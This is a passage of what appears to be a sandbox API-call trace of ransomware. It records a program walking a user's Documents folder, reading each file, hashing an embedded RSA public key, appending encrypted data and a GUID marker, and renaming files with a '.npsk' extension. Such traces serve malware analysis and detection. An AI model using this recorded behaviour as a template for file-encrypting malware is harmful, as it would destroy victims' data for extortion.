KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.007] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.008] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.008] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.008] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.008] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.008] GetLastError () returned 0x0 [0217.008] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.008] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.008] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.008] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.008] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.009] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.009] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x816a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.009] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.010] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.010] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.010] CloseHandle (hObject=0x61c) returned 1 [0217.016] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\F1zwWt-ztRzNNQA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\f1zwwt-ztrznnqa.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\F1zwWt-ztRzNNQA.ods.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\f1zwwt-ztrznnqa.ods.npsk")) returned 1 [0217.019] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6274c30, ftCreationTime.dwHighDateTime=0x1d5e382, ftLastAccessTime.dwLowDateTime=0xe9342f90, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xe9342f90, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0xc352, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ivLkljjlFirGNlp2oo.pdf", cAlternateFileName="IVLKLJ~1.PDF")) returned 1 [0217.019] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ivLkljjlFirGNlp2oo.pdf") returned=".pdf" [0217.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ivLkljjlFirGNlp2oo.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\ivlkljjlfirgnlp2oo.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.020] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=50002) returned 1 [0217.020] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.022] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc32c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.022] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.024] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc352, lpOverlapped=0x0) returned 1 [0217.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.025] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.026] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.026] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.026] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.026] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.026] GetLastError () returned 0x0 [0217.026] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.026] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.026] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.026] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.027] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.027] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.028] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.028] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.028] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.028] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.028] CloseHandle (hObject=0x61c) returned 1 [0217.031] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ivLkljjlFirGNlp2oo.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\ivlkljjlfirgnlp2oo.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ivLkljjlFirGNlp2oo.pdf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\ivlkljjlfirgnlp2oo.pdf.npsk")) returned 1 [0217.033] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f16a240, ftCreationTime.dwHighDateTime=0x1d5d80a, ftLastAccessTime.dwLowDateTime=0x84889120, ftLastAccessTime.dwHighDateTime=0x1d5dfa8, ftLastWriteTime.dwLowDateTime=0x84889120, ftLastWriteTime.dwHighDateTime=0x1d5dfa8, nFileSizeHigh=0x0, nFileSizeLow=0x16fdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LWFMTLGWJj0tG.ots", cAlternateFileName="LWFMTL~1.OTS")) returned 1 [0217.033] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\LWFMTLGWJj0tG.ots") returned=".ots" [0217.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\LWFMTLGWJj0tG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\lwfmtlgwjj0tg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.033] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=94173) returned 1 [0217.033] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.035] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16fb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.035] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.038] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16fdd, lpOverlapped=0x0) returned 1 [0217.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.039] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.040] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.040] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.040] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.040] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.040] GetLastError () returned 0x0 [0217.040] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.040] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.040] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.040] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.040] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.041] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.042] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16fdd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.042] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.043] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.043] CloseHandle (hObject=0x61c) returned 1 [0217.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\LWFMTLGWJj0tG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\lwfmtlgwjj0tg.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\LWFMTLGWJj0tG.ots.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\lwfmtlgwjj0tg.ots.npsk")) returned 1 [0217.047] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904c9e90, ftCreationTime.dwHighDateTime=0x1d5dc81, ftLastAccessTime.dwLowDateTime=0x3f3a3680, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x3f3a3680, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0xc568, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W5VT.xlsx", cAlternateFileName="W5VT~1.XLS")) returned 1 [0217.047] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\W5VT.xlsx") returned=".xlsx" [0217.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\W5VT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\w5vt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.047] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=50536) returned 1 [0217.047] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.049] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc542, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.049] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.051] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc568, lpOverlapped=0x0) returned 1 [0217.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.053] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.054] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.054] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.054] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.054] CryptGetHashParam (in: 